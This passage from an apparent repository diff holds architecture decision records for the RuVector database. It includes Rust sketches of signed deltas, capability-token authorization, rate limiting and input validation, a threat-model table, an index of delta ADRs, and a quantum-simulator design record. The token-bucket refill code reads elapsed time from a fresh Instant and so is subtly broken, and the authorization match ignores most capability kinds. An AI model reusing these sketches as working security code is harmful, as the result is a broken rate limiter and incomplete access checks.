pub issued_at: DateTime<Utc>,
/// Expires at
pub expires_at: DateTime<Utc>,
/// Restrictions
pub restrictions: TokenRestrictions,
/// Signature
pub signature: Signature,
}
/// Individual capability grant
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum Capability {
/// Create deltas for specific vectors
CreateDelta {
vector_patterns: Vec<VectorPattern>,
operation_types: Vec<OperationType>,
},
/// Read vectors and their deltas
ReadVector {
vector_patterns: Vec<VectorPattern>,
},
/// Search capability
Search {
namespaces: Vec<String>,
max_k: usize,
},
/// Compact delta chains
Compact {
vector_patterns: Vec<VectorPattern>,
},
/// Administrative capability
Admin {
scope: AdminScope,
},
}
/// Pattern for matching vector IDs
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum VectorPattern {
/// Exact match
Exact(VectorId),
/// Prefix match
Prefix(String),
/// Regex match
Regex(String),
/// All vectors in namespace
Namespace(String),
/// All vectors
All,
}
/// Token restrictions
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TokenRestrictions {
/// Rate limit (requests per second)
pub rate_limit: Option<f32>,
/// IP address restrictions
pub allowed_ips: Option<Vec<IpNetwork>>,
/// Time of day restrictions
pub time_windows: Option<Vec<TimeWindow>>,
/// Maximum delta size
pub max_delta_size: Option<usize>,
}
/// Capability verifier
pub struct CapabilityVerifier {
/// Trusted issuers' public keys
issuer_keys: DashMap<String, VerifyingKey>,
/// Token revocation list
revoked: HashSet<TokenId>,
}
impl CapabilityVerifier {
/// Verify token and extract capabilities
pub fn verify_token(&self, token: &CapabilityToken) -> Result<&[Capability], AuthError> {
// Check not revoked
if self.revoked.contains(&token.token_id) {
return Err(AuthError::TokenRevoked);
}
// Check expiration
if Utc::now() > token.expires_at {
return Err(AuthError::TokenExpired);
}
// Check not before issued
if Utc::now() < token.issued_at {
return Err(AuthError::TokenNotYetValid);
}
// Verify signature
let issuer_key = self.issuer_keys
.get(&token.issuer)
.ok_or(AuthError::UnknownIssuer)?;
let payload = self.compute_token_hash(token);
issuer_key.verify(&payload, &token.signature)
.map_err(|_| AuthError::InvalidTokenSignature)?;
Ok(&token.capabilities)
}
/// Check if token authorizes an operation
pub fn authorize(
&self,
token: &CapabilityToken,
operation: &DeltaOperation,
vector_id: &VectorId,
) -> Result<(), AuthError> {
let capabilities = self.verify_token(token)?;
for cap in capabilities {
if self.capability_allows(cap, operation, vector_id) {
return Ok(());
}
}
Err(AuthError::Unauthorized)
}
fn capability_allows(
&self,
cap: &Capability,
operation: &DeltaOperation,
vector_id: &VectorId,
) -> bool {
match cap {
Capability::CreateDelta { vector_patterns, operation_types } => {
// Check vector pattern
let vector_match = vector_patterns.iter()
.any(|p| self.pattern_matches(p, vector_id));
// Check operation type
let op_match = operation_types.contains(&operation.operation_type());
vector_match && op_match
}
Capability::Admin { scope: AdminScope::Full } => true,
_ => false,
}
}
fn pattern_matches(&self, pattern: &VectorPattern, vector_id: &VectorId) -> bool {
match pattern {
VectorPattern::Exact(id) => id == vector_id,
VectorPattern::Prefix(prefix) => vector_id.starts_with(prefix),
VectorPattern::Regex(re) => {
regex::Regex::new(re)
.map(|r| r.is_match(vector_id))
.unwrap_or(false)
}
VectorPattern::Namespace(ns) => {
vector_id.starts_with(&format!("{}:", ns))
}
VectorPattern::All => true,
}
}
}
```
#### 3. Rate Limiting and DoS Protection
```rust
/// Rate limiter for delta operations
pub struct DeltaRateLimiter {
/// Per-client limits
client_limits: DashMap<ClientId, TokenBucket>,
/// Per-vector limits
vector_limits: DashMap<VectorId, TokenBucket>,
/// Global limit
global_limit: TokenBucket,
/// Configuration
config: RateLimitConfig,
}
/// Token bucket for rate limiting
pub struct TokenBucket {
/// Current tokens
tokens: AtomicF64,
/// Last refill time
last_refill: AtomicU64,
/// Tokens per second
rate: f64,
/// Maximum tokens
capacity: f64,
}
impl TokenBucket {
/// Try to consume tokens
pub fn try_consume(&self, tokens: f64) -> bool {
// Refill based on elapsed time
self.refill();
loop {
let current = self.tokens.load(Ordering::Relaxed);
if current < tokens {
return false;
}
if self.tokens.compare_exchange(
current,
current - tokens,
Ordering::SeqCst,
Ordering::Relaxed,
).is_ok() {
return true;
}
}
}
fn refill(&self) {
let now = Instant::now().elapsed().as_millis() as u64;
let last = self.last_refill.load(Ordering::Relaxed);
let elapsed = (now - last) as f64 / 1000.0;
let new_tokens = (self.tokens.load(Ordering::Relaxed) + elapsed * self.rate)
.min(self.capacity);
self.tokens.store(new_tokens, Ordering::Relaxed);
self.last_refill.store(now, Ordering::Relaxed);
}
}
impl DeltaRateLimiter {
/// Check if operation is allowed
pub fn check(&self, client_id: &ClientId, vector_id: &VectorId) -> Result<(), RateLimitError> {
// Check global limit
if !self.global_limit.try_consume(1.0) {
return Err(RateLimitError::GlobalLimitExceeded);
}
// Check client limit
let client_bucket = self.client_limits
.entry(client_id.clone())
.or_insert_with(|| TokenBucket::new(
self.config.client_rate,
self.config.client_burst,
));
if !client_bucket.try_consume(1.0) {
return Err(RateLimitError::ClientLimitExceeded);
}
// Check vector limit (prevent hot-key abuse)
let vector_bucket = self.vector_limits
.entry(vector_id.clone())
.or_insert_with(|| TokenBucket::new(
self.config.vector_rate,
self.config.vector_burst,
));
if !vector_bucket.try_consume(1.0) {
return Err(RateLimitError::VectorLimitExceeded);
}
Ok(())
}
}
```
#### 4. Input Validation
```rust
/// Delta input validator
pub struct DeltaValidator {
/// Maximum delta size
max_delta_size: usize,
/// Maximum dimensions
max_dimensions: usize,
/// Allowed operation types
allowed_operations: HashSet<OperationType>,
/// Metadata schema (optional)
metadata_schema: Option<JsonSchema>,
}
impl DeltaValidator {
/// Validate a delta before processing
pub fn validate(&self, delta: &VectorDelta) -> Result<(), ValidationError> {
// Check delta ID format
self.validate_id(&delta.delta_id)?;
self.validate_id(&delta.vector_id)?;
// Check operation type allowed
if !self.allowed_operations.contains(&delta.operation.operation_type()) {
return Err(ValidationError::DisallowedOperation);
}
// Validate operation content
self.validate_operation(&delta.operation)?;
// Validate metadata if present
if let Some(metadata) = &delta.metadata_delta {
self.validate_metadata(metadata)?;
}
// Check timestamp is sane
self.validate_timestamp(delta.timestamp)?;
Ok(())
}
fn validate_id(&self, id: &str) -> Result<(), ValidationError> {
// Check length
if id.len() > 256 {
return Err(ValidationError::IdTooLong);
}
// Check for path traversal
if id.contains("..") || id.contains('/') || id.contains('\\') {
return Err(ValidationError::InvalidIdChars);
}
// Check for null bytes
if id.contains('\0') {
return Err(ValidationError::InvalidIdChars);
}
Ok(())
}
fn validate_operation(&self, op: &DeltaOperation) -> Result<(), ValidationError> {
match op {
DeltaOperation::Sparse { indices, values } => {
// Check arrays have same length
if indices.len() != values.len() {
return Err(ValidationError::MismatchedArrayLengths);
}
// Check indices are valid
for &idx in indices {
if idx as usize >= self.max_dimensions {
return Err(ValidationError::IndexOutOfBounds);
}
}
// Check for NaN/Inf values
for &val in values {
if !val.is_finite() {
return Err(ValidationError::InvalidValue);
}
}
// Check total size
if indices.len() * 8 > self.max_delta_size {
return Err(ValidationError::DeltaTooLarge);
}
}
DeltaOperation::Dense { vector } => {
// Check dimensions
if vector.len() > self.max_dimensions {
return Err(ValidationError::TooManyDimensions);
}
// Check for NaN/Inf
for &val in vector {
if !val.is_finite() {
return Err(ValidationError::InvalidValue);
}
}
// Check size
if vector.len() * 4 > self.max_delta_size {
return Err(ValidationError::DeltaTooLarge);
}
}
DeltaOperation::Scale { factor } => {
if !factor.is_finite() || *factor == 0.0 {
return Err(ValidationError::InvalidValue);
}
}
_ => {}
}
Ok(())
}
fn validate_timestamp(&self, ts: DateTime<Utc>) -> Result<(), ValidationError> {
let now = Utc::now();
let age = now.signed_duration_since(ts);
// Reject timestamps too far in the past (7 days)
if age.num_days() > 7 {
return Err(ValidationError::TimestampTooOld);
}
// Reject timestamps in the future (with 5 min tolerance)
if age.num_minutes() < -5 {
return Err(ValidationError::TimestampInFuture);
}
Ok(())
}
}
```
---
## Threat Model Analysis
### Attack Vectors and Mitigations
| Attack | Vector | Mitigation | Residual Risk |
|--------|--------|------------|---------------|
| Delta tampering | Network MitM | TLS + signatures | Low |
| Replay attack | Network replay | Nonces + timestamp | Low |
| Unauthorized access | API abuse | Capability tokens | Low |
| Data exfiltration | Side channels | Rate limiting | Medium |
| DoS flooding | Request flood | Rate limiting | Medium |
| Key compromise | Key theft | Key rotation | Medium |
| Privilege escalation | Token forge | Signature verification | Low |
| Input injection | Malformed delta | Input validation | Low |
### Security Guarantees
| Guarantee | Mechanism | Strength |
|-----------|-----------|----------|
| Integrity | Ed25519 signatures | Cryptographic |
| Authentication | mTLS + tokens | Cryptographic |
| Authorization | Capability tokens | Logical |
| Replay protection | Nonces + timestamps | Probabilistic |
| Rate limiting | Token buckets | Statistical |
---
## Considered Options
### Option 1: Simple API Keys
**Description**: Basic API key authentication.
**Pros**:
- Simple to implement
- Easy to understand
**Cons**:
- No fine-grained control
- Key compromise is catastrophic
- No delta-level security
**Verdict**: Rejected - insufficient for delta integrity.
### Option 2: JWT Tokens
**Description**: Standard JWT for authentication.
**Pros**:
- Industry standard
- Rich ecosystem
**Cons**:
- No per-delta signatures
- Revocation complexity
- Limited capability model
**Verdict**: Partially adopted - used alongside capabilities.
### Option 3: Signed Deltas + Capabilities (Selected)
**Description**: Cryptographic signatures on deltas with capability-based auth.
**Pros**:
- Delta-level integrity
- Fine-grained authorization
- Non-repudiation
- Composable security
**Cons**:
- Complexity
- Performance overhead
- Key management
**Verdict**: Adopted - provides comprehensive security.
### Option 4: Zero-Knowledge Proofs
**Description**: ZK proofs for privacy-preserving updates.
**Pros**:
- Maximum privacy
- Verifiable computation
**Cons**:
- Very complex
- High overhead
- Limited tooling
**Verdict**: Deferred - consider for future privacy features.
---
## Technical Specification
### Security Configuration
```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SecurityConfig {
/// Enable delta signing
pub signing_enabled: bool,
/// Signing algorithm
pub signing_algorithm: SigningAlgorithm,
/// Enable capability tokens
pub capabilities_enabled: bool,
/// Token issuer public keys
pub trusted_issuers: Vec<TrustedIssuer>,
/// Rate limiting configuration
pub rate_limits: RateLimitConfig,
/// Input validation configuration
pub validation: ValidationConfig,
/// Clock skew tolerance
pub clock_tolerance: Duration,
/// Nonce window (for replay protection)
pub nonce_window: Duration,
}
impl Default for SecurityConfig {
fn default() -> Self {
Self {
signing_enabled: true,
signing_algorithm: SigningAlgorithm::Ed25519,
capabilities_enabled: true,
trusted_issuers: vec![],
rate_limits: RateLimitConfig {
global_rate: 100_000.0, // 100K ops/s global
client_rate: 1000.0, // 1K ops/s per client
client_burst: 100.0,
vector_rate: 100.0, // 100 ops/s per vector
vector_burst: 10.0,
},
validation: ValidationConfig {
max_delta_size: 1024 * 1024, // 1MB
max_dimensions: 4096,
max_metadata_size: 65536,
},
clock_tolerance: Duration::from_secs(300), // 5 minutes
nonce_window: Duration::from_secs(86400), // 24 hours
}
}
}
```
### Wire Format for Signed Delta
```
Signed Delta Format:
+--------+--------+--------+--------+--------+--------+--------+--------+
| Magic | Version| Flags | Reserved | Delta Length |
| 0x53 | 0x01 | | | (32-bit LE) |
+--------+--------+--------+--------+--------+--------+--------+--------+
| Delta Payload |
| (VectorDelta, encoded) |
+-----------------------------------------------------------------------+
| Key ID (32 bytes) |
+-----------------------------------------------------------------------+
| Timestamp (64-bit LE, Unix ms) |
+-----------------------------------------------------------------------+
| Nonce (16 bytes) |
+-----------------------------------------------------------------------+
| Signature (64 bytes, Ed25519) |
+-----------------------------------------------------------------------+
Flags:
bit 0: Compressed delta payload
bit 1: Has capability token attached
bits 2-7: Reserved
```
---
## Consequences
### Benefits
1. **Integrity**: Tamper-proof deltas with cryptographic verification
2. **Authorization**: Fine-grained capability-based access control
3. **Auditability**: Non-repudiation through signatures
4. **Resilience**: DoS protection through rate limiting
5. **Flexibility**: Configurable security levels
### Risks and Mitigations
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Key compromise | Low | Critical | Key rotation, HSM |
| Performance overhead | Medium | Medium | Batch verification |
| Configuration errors | Medium | High | Secure defaults |
| Clock drift | Low | Medium | NTP, tolerance |
---
## References
1. NIST SP 800-63: Digital Identity Guidelines
2. RFC 8032: Edwards-Curve Digital Signature Algorithm (EdDSA)
3. ADR-DB-001: Delta Behavior Core Architecture
4. ADR-007: Security Review & Technical Debt
---
## Related Decisions
- **ADR-DB-001**: Delta Behavior Core Architecture
- **ADR-DB-003**: Delta Propagation Protocol
- **ADR-DB-009**: Delta Observability
- **ADR-007**: Security Review & Technical Debt

View File

@@ -0,0 +1,184 @@
# Delta-Behavior Architecture Decision Records
This directory contains the Architecture Decision Records (ADRs) for implementing Delta-Behavior in RuVector - a delta-first approach to incremental vector updates.
## Overview
Delta-Behavior transforms RuVector into a **delta-first vector database** where all updates are expressed as incremental changes (deltas) rather than full vector replacements. This approach provides:
- **10-100x bandwidth reduction** for sparse updates
- **Full temporal history** with point-in-time queries
- **CRDT-based conflict resolution** for concurrent updates
- **Lazy index repair** with quality bounds
- **Multi-tier compression** (5-50x storage reduction)
## ADR Index
| ADR | Title | Status | Summary |
|-----|-------|--------|---------|
| [ADR-DB-001](ADR-DB-001-delta-behavior-core-architecture.md) | Delta Behavior Core Architecture | Proposed | Delta-first architecture with layered composition |
| [ADR-DB-002](ADR-DB-002-delta-encoding-format.md) | Delta Encoding Format | Proposed | Hybrid sparse-dense with adaptive switching |
| [ADR-DB-003](ADR-DB-003-delta-propagation-protocol.md) | Delta Propagation Protocol | Proposed | Reactive push with backpressure |
| [ADR-DB-004](ADR-DB-004-delta-conflict-resolution.md) | Delta Conflict Resolution | Proposed | CRDT-based with causal ordering |
| [ADR-DB-005](ADR-DB-005-delta-index-updates.md) | Delta Index Updates | Proposed | Lazy repair with quality bounds |
| [ADR-DB-006](ADR-DB-006-delta-compression-strategy.md) | Delta Compression Strategy | Proposed | Multi-tier compression pipeline |
| [ADR-DB-007](ADR-DB-007-delta-temporal-windows.md) | Delta Temporal Windows | Proposed | Adaptive windows with compaction |
| [ADR-DB-008](ADR-DB-008-delta-wasm-integration.md) | Delta WASM Integration | Proposed | Component model with shared memory |
| [ADR-DB-009](ADR-DB-009-delta-observability.md) | Delta Observability | Proposed | Delta lineage tracking with OpenTelemetry |
| [ADR-DB-010](ADR-DB-010-delta-security-model.md) | Delta Security Model | Proposed | Signed deltas with capability tokens |
## Architecture Diagram
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ DELTA-BEHAVIOR ARCHITECTURE │
└─────────────────────────────────────────────────────────────────────────────┘
┌───────────────┐
│ Delta API │ ADR-001
│ (apply, get, │
│ rollback) │
└───────┬───────┘
┌─────────────────┼─────────────────┐
│ │ │
v v v
┌───────────────┐ ┌───────────────┐ ┌───────────────┐
│ Security │ │ Propagation │ │ Observability │
│ (signed, │ │ (reactive, │ │ (lineage, │
│ capability) │ │ backpressure)│ │ tracing) │
│ ADR-010 │ │ ADR-003 │ │ ADR-009 │
└───────┬───────┘ └───────┬───────┘ └───────┬───────┘
│ │ │
└─────────────────┼─────────────────┘
┌───────v───────┐
│ Conflict │ ADR-004
│ Resolution │
│ (CRDT, VC) │
└───────┬───────┘
┌─────────────────┼─────────────────┐
│ │ │
v v v
┌───────────────┐ ┌───────────────┐ ┌───────────────┐
│ Encoding │ │ Temporal │ │ Index │
│ (sparse/ │ │ Windows │ │ Updates │
│ dense/RLE) │ │ (adaptive) │ │ (lazy repair) │
│ ADR-002 │ │ ADR-007 │ │ ADR-005 │
└───────┬───────┘ └───────┬───────┘ └───────┬───────┘
│ │ │
└─────────────────┼─────────────────┘
┌─────────────────┼─────────────────┐
│ │ │
v v v
┌───────────────┐ ┌───────────────┐ ┌───────────────┐
│ Compression │ │ WASM │ │ Storage │
│ (LZ4/Zstd/ │ │ Integration │ │ Layer │
│ quantize) │ │ (component │ │ (delta log, │
│ ADR-006 │ │ model) │ │ checkpoint) │
│ │ │ ADR-008 │ │ ADR-001 │
└───────────────┘ └───────────────┘ └───────────────┘
```
## Key Design Decisions
### 1. Delta-First Storage (ADR-001)
All mutations are stored as deltas. Full vectors are materialized on-demand by composing delta chains. Checkpoints provide optimization points for composition.
### 2. Hybrid Encoding (ADR-002)
Automatic selection between sparse, dense, RLE, and dictionary encoding based on delta characteristics. Achieves 1-10x encoding-level compression.
### 3. Reactive Propagation (ADR-003)
Push-based delta distribution with explicit backpressure. Causal ordering via vector clocks ensures consistency.
### 4. CRDT Merging (ADR-004)
Per-dimension version tracking with configurable conflict resolution strategies (LWW, max, average, custom).
### 5. Lazy Index Repair (ADR-005)
Index updates are deferred until quality degrades below bounds. Background repair maintains recall targets.
### 6. Multi-Tier Compression (ADR-006)
Encoding -> Quantization -> Entropy coding -> Batch optimization. Achieves 5-50x total compression.
### 7. Adaptive Windows (ADR-007)
Dynamic window sizing based on load. Automatic compaction reduces long-term storage.
### 8. WASM Component Model (ADR-008)
Clean interface contracts for browser deployment. Shared memory patterns for high-throughput scenarios.
### 9. Lineage Tracking (ADR-009)
Full delta provenance with OpenTelemetry integration. Point-in-time reconstruction and blame queries.
### 10. Signed Deltas (ADR-010)
Ed25519 signatures for integrity. Capability tokens for fine-grained authorization.
## Performance Targets
| Metric | Target | Notes |
|--------|--------|-------|
| Delta application | < 50us | Faster than full write |
| Composition (100 deltas) | < 1ms | With checkpoint |
| Network reduction (sparse) | > 10x | For <10% dimension changes |
| Storage compression | 5-50x | With full pipeline |
| Index recall degradation | < 5% | With lazy repair |
| Security overhead | < 100us | Signature verification |
## Implementation Phases
### Phase 1: Core Infrastructure
- Delta types and storage (ADR-001)
- Basic encoding (ADR-002)
- Simple checkpointing
### Phase 2: Distribution
- Propagation protocol (ADR-003)
- Conflict resolution (ADR-004)
- Causal ordering
### Phase 3: Index Integration
- Lazy repair (ADR-005)
- Quality monitoring
- Incremental HNSW
### Phase 4: Optimization
- Multi-tier compression (ADR-006)
- Temporal windows (ADR-007)
- Adaptive policies
### Phase 5: Platform
- WASM integration (ADR-008)
- Observability (ADR-009)
- Security model (ADR-010)
## Dependencies
| Component | Crate | Purpose |
|-----------|-------|---------|
| Signatures | `ed25519-dalek` | Delta signing |
| Compression | `lz4_flex`, `zstd` | Entropy coding |
| Tracing | `opentelemetry` | Observability |
| Async | `tokio` | Propagation |
| Serialization | `bincode`, `serde` | Wire format |
## Related ADRs
- **ADR-001**: Ruvector Core Architecture
- **ADR-CE-002**: Incremental Coherence Computation
- **ADR-005**: WASM Runtime Integration
- **ADR-007**: Security Review & Technical Debt
## References
1. Shapiro, M., et al. "Conflict-free Replicated Data Types." SSS 2011.
2. Kleppmann, M. "Designing Data-Intensive Applications." O'Reilly, 2017.
3. Malkov, Y., & Yashunin, D. "Efficient and robust approximate nearest neighbor search using HNSW graphs."
4. OpenTelemetry Specification. https://opentelemetry.io/docs/specs/
5. WebAssembly Component Model. https://component-model.bytecodealliance.org/
---
**Authors**: RuVector Architecture Team
**Date**: 2026-01-28
**Status**: Proposed

View File

@@ -0,0 +1,305 @@
# ADR-QE-001: Quantum Engine Core Architecture
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
## Context
### Problem Statement
ruVector needs a quantum simulation engine for on-device quantum algorithm
experimentation. The platform runs on distributed edge systems, primarily
targeting Cognitum's 256-core low-power processors, and emphasizes ultra-low-power
event-driven computing. Quantum simulation is a natural extension of ruVector's
mathematical computation capabilities: the same SIMD-optimized linear algebra
that powers vector search and neural inference can drive state-vector manipulation
for quantum circuits.
### Requirements
The engine must support gate-model quantum circuit simulation up to approximately
25 qubits, covering the following algorithm families:
| Algorithm Family | Use Case | Typical Qubits | Gate Depth |
|------------------|----------|-----------------|------------|
| VQE (Variational Quantum Eigensolver) | Molecular simulation, optimization | 8-20 | 50-500 per iteration |
| Grover's Search | Unstructured database search | 8-25 | O(sqrt(2^n)) |
| QAOA (Quantum Approximate Optimization) | Combinatorial optimization | 10-25 | O(p * edges) |
| Quantum Error Correction | Surface code, stabilizer circuits | 9-25 (logical + ancilla) | Repetitive syndrome rounds |
### Memory Scaling Analysis
Quantum state-vector simulation stores the full amplitude vector of 2^n complex
numbers. Each amplitude is a pair of f64 values (real + imaginary = 16 bytes).
Memory grows exponentially:
```
Qubits Amplitudes State Size With Scratch Buffer
------ ----------- ---------- -------------------
10 1,024 16 KB 32 KB
15 32,768 512 KB 1 MB
20 1,048,576 16 MB 32 MB
22 4,194,304 64 MB 128 MB
24 16,777,216 256 MB 512 MB
25 33,554,432 512 MB 1.07 GB
26 67,108,864 1.07 GB 2.14 GB
28 268,435,456 4.29 GB 8.59 GB
30 1,073,741,824 17.18 GB 34.36 GB
```
At 25 qubits the state vector requires approximately 512 MB (1.07 GB with a
scratch buffer for intermediate calculations). This is the practical ceiling
for WebAssembly's 32-bit address space. Native execution with sufficient RAM
can push to 30+ qubits.
### Edge Computing Constraints
Cognitum's 256-core processors operate under strict power and memory budgets:
- **Power envelope**: Event-driven activation; cores idle at near-zero draw
- **Memory**: Shared pool, typically 2-8 GB per node
- **Interconnect**: Low-latency mesh between cores, suitable for parallel simulation
- **Workload model**: Burst computation triggered by agent events, not continuous
The quantum engine must respect this model: allocate state only when a simulation
is triggered, execute the circuit, return results, and immediately release all
memory.
## Decision
Implement a **pure Rust state-vector quantum simulator** as a new crate family
(`ruQu` quantum engine) within the ruVector workspace. The following architectural
decisions define the engine.
### 1. Pure Rust Implementation (No C/C++ FFI)
The entire simulation engine is written in Rust with no foreign function interface
dependencies. This ensures:
- Compilation to `wasm32-unknown-unknown` without emscripten or C toolchains
- Memory safety guarantees throughout the simulation pipeline
- Unified build system via Cargo across all targets
- No external library version conflicts or platform-specific linking issues
### 2. State-Vector Simulation as Primary Backend
The engine uses explicit full-amplitude state-vector representation as its
primary simulation mode. Each gate application transforms the full 2^n
amplitude vector via matrix-vector multiplication.
```
Circuit Execution Model:
|psi_0> ──[H]──[CNOT]──[Rz(theta)]──[Measure]── classical bits
| | | |
v v v v
[init] [apply_H] [apply_CNOT] [apply_Rz] [sample]
| | | | |
2^n f64 2^n f64 2^n f64 2^n f64 collapse
complex complex complex complex to basis
```
Gate application follows the standard decomposition:
- **Single-qubit gates**: Iterate amplitude pairs (i, i XOR 2^target), apply 2x2
unitary. O(2^n) operations per gate.
- **Two-qubit gates**: Iterate amplitude quadruples, apply 4x4 unitary.
O(2^n) operations per gate.
- **Multi-qubit gates**: Decompose into single and two-qubit gates, or apply
directly via 2^k x 2^k matrix on k target qubits.
### 3. Qubit Limits and Precision
| Parameter | WASM Target | Native Target |
|-----------|-------------|---------------|
| Max qubits (default) | 25 | 30+ (RAM-dependent) |
| Max qubits (hard limit) | 26 (with f32) | Memory-limited |
| Precision (default) | Complex f64 | Complex f64 |
| Precision (optional) | Complex f32 | Complex f32 |
| State size at max | ~1.07 GB | ~17 GB at 30 qubits |
Complex f64 is the default precision, providing approximately 15 decimal digits
of accuracy -- sufficient for quantum chemistry applications and deep circuits
where accumulated floating-point error matters. An optional f32 mode halves
memory usage at the cost of precision, suitable for shallow circuits and
approximate optimization.
### 4. Event-Driven Activation Model
The engine follows ruVector's event-driven philosophy:
```
Agent Context ruQu Engine Memory
| | |
|-- trigger(circuit) ->| |
| |-- allocate(2^n) ---->|
| |<---- state_ptr ------|
| | |
| |-- [execute gates] -->|
| |-- [measure] -------->|
| | |
|<-- results ---------| |
| |-- deallocate() ----->|
| | |
(idle) (inert) (freed)
```
- **Inert by default**: No background threads, no persistent allocations
- **Allocate on demand**: State vector created when circuit execution begins
- **Free immediately**: All simulation memory released upon result delivery
- **No global state**: Multiple concurrent simulations supported via independent
state handles (no shared mutable global)
### 5. Dual-Target Compilation
The crate supports two compilation targets from a single codebase:
```
ruqu-core
|
+----------+----------+
| |
[native target] [wasm32-unknown-unknown]
| |
- Full SIMD (AVX2, - WASM SIMD128
AVX-512, NEON) - 4GB address limit
- Rayon threading - Optional SharedArrayBuffer
- Optional GPU (wgpu) - No GPU
- 30+ qubits - 25 qubit ceiling
- Full OS integration - Sandboxed
```
Conditional compilation via Cargo feature flags controls target-specific code
paths. The public API surface is identical across targets.
### 6. Optional Tensor Network Mode
For circuits with limited entanglement (e.g., shallow QAOA, certain VQE
ansatze), the engine offers an optional tensor network backend:
- Represents the quantum state as a network of tensors rather than a single
exponential vector
- Memory scales as O(n * chi^2) where chi is the bond dimension (maximum
entanglement width)
- Efficient for circuits where entanglement grows slowly or remains bounded
- Falls back to full state-vector when bond dimension exceeds threshold
- Enabled via the `tensor-network` feature flag
## Alternatives Considered
### Alternative 1: Qukit (Rust, WASM-ready)
A pre-1.0 Rust quantum simulator with WASM support.
| Criterion | Assessment |
|-----------|------------|
| Maturity | Pre-1.0, limited community |
| WASM support | Present but untested at scale |
| Optimization | Basic; no SIMD, no gate fusion |
| Integration | Would require adapter layer |
| Maintenance | External dependency risk |
**Rejected**: Insufficient optimization depth and maturity for production use.
### Alternative 2: QuantRS2 (Rust, Python-focused)
A Rust quantum simulator primarily targeting Python bindings via PyO3.
| Criterion | Assessment |
|-----------|------------|
| Performance | Good benchmarks on native |
| WASM support | Not a design target |
| Dependencies | Heavy; Python-oriented build |
| API design | Python-first, Rust API secondary |
| Integration | Significant impedance mismatch |
**Rejected**: Python-centric design creates unnecessary weight and integration
friction for a Rust-native edge system.
### Alternative 3: roqoqo + QuEST (Rust frontend, C backend)
roqoqo provides a Rust circuit description layer; QuEST is a high-performance
C/C++ state-vector simulator.
| Criterion | Assessment |
|-----------|------------|
| Performance | Excellent (QuEST is highly optimized) |
| WASM support | QuEST's C code breaks WASM compilation |
| Maintenance | External C library maintenance burden |
| Memory safety | C backend outside Rust safety guarantees |
**Rejected**: C dependency is incompatible with WASM target requirement.
### Alternative 4: Quant-Iron (Rust + OpenCL)
A Rust simulator leveraging OpenCL for GPU acceleration.
| Criterion | Assessment |
|-----------|------------|
| Performance | Excellent on GPU-equipped hardware |
| WASM support | OpenCL incompatible with WASM |
| Edge deployment | Most edge nodes lack discrete GPUs |
| Complexity | OpenCL runtime adds operational burden |
**Rejected**: OpenCL dependency incompatible with WASM and edge deployment model.
### Alternative 5: No Simulator (Cloud Quantum APIs)
Delegate all quantum computation to cloud-based quantum simulators or hardware.
| Criterion | Assessment |
|-----------|------------|
| Performance | Network-bound latency |
| Offline support | None; requires connectivity |
| Cost | Per-execution charges |
| Privacy | Circuit data sent to third party |
| Edge philosophy | Violates offline-first design |
**Rejected**: Fundamentally incompatible with ruVector's offline-first edge
computing philosophy.
## Consequences
### Positive
- **Full control**: Complete ownership of the simulation pipeline, enabling
deep integration with ruVector's math, SIMD, and memory subsystems
- **WASM portable**: Single codebase compiles to any WASM runtime, enabling
browser-based quantum experimentation
- **No external dependencies**: Eliminates supply chain risk from C/C++ or
Python library dependencies
- **Edge-aligned**: Event-driven activation model matches Cognitum's power
architecture
- **Extensible**: Gate set, noise models, and backends can evolve independently
### Negative
- **Development effort**: Building a competitive quantum simulator from scratch
requires significant engineering investment
- **Maintenance burden**: Team must benchmark, optimize, and maintain the
simulation engine alongside the rest of ruVector
- **Classical simulation limits**: Exponential scaling is a fundamental physics
constraint; the engine cannot exceed ~30 qubits on practical hardware
### Risks and Mitigations
| Risk | Likelihood | Impact | Mitigation |
|------|-----------|--------|------------|
| Performance below competitors | Medium | High | Benchmark-driven development against QuantRS2/Qukit |
| Floating-point accuracy drift | Low | Medium | Comprehensive numerical tests, optional f64 enforcement |
| WASM memory exhaustion | Medium | Medium | Hard qubit limit with clear error messages (ADR-QE-003) |
| Scope creep into hardware simulation | Low | Low | Strict scope: gate-model only, no analog/pulse simulation |
## References
- [ADR-005: WASM Runtime Integration](/docs/adr/ADR-005-wasm-runtime-integration.md)
- [ADR-003: SIMD Optimization Strategy](/docs/adr/ADR-003-simd-optimization-strategy.md)
- [ADR-006: Memory Management](/docs/adr/ADR-006-memory-management.md)
- [ADR-014: Coherence Engine](/docs/adr/ADR-014-coherence-engine.md)
- [ADR-QE-002: Crate Structure & Integration](./ADR-QE-002-crate-structure-integration.md)
- [ADR-QE-003: WASM Compilation Strategy](./ADR-QE-003-wasm-compilation-strategy.md)
- [ADR-QE-004: Performance Optimization & Benchmarks](./ADR-QE-004-performance-optimization-benchmarks.md)
- Nielsen & Chuang, "Quantum Computation and Quantum Information" (2010)
- Aaronson & Gottesman, "Improved simulation of stabilizer circuits" (2004)

View File

@@ -0,0 +1,474 @@
# ADR-QE-002: Crate Structure & ruVector Integration
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
## Context
### Problem Statement
The quantum engine must fit within the ruVector workspace, which currently
comprises 73+ crates following a consistent modular architecture. The existing
`ruQu` crate handles classical coherence monitoring -- specifically min-cut
analysis and MWPM (Minimum Weight Perfect Matching) decoding for error
correction analysis. The new quantum simulation capability requires clear
separation from this classical functionality while integrating deeply with
ruVector's shared infrastructure.
### Existing Workspace Patterns
The ruVector workspace follows established conventions that the quantum engine
must respect:
```
ruvector/
crates/
ruvector-math/ # SIMD-optimized linear algebra
ruvector-hnsw/ # Vector similarity search
ruvector-metrics/ # Observability and telemetry
ruvector-router-wasm/ # WASM bindings for routing
ruQu/ # Classical coherence (min-cut, MWPM)
...73+ crates
Cargo.toml # Workspace root
```
Key conventions observed:
- **`no_std` + `alloc`** for maximum portability
- **Feature flags** for optional capabilities (parallel, gpu, etc.)
- **Separate WASM crates** for browser-facing bindings (e.g., `ruvector-router-wasm`)
- **Metrics integration** via `ruvector-metrics` for observability
- **SIMD reuse** via `ruvector-math` for hot-path computations
### Integration Points
The quantum engine must interact with several existing subsystems:
```
+-------------------+
| Agent Framework |
+--------+----------+
|
trigger circuit execution
|
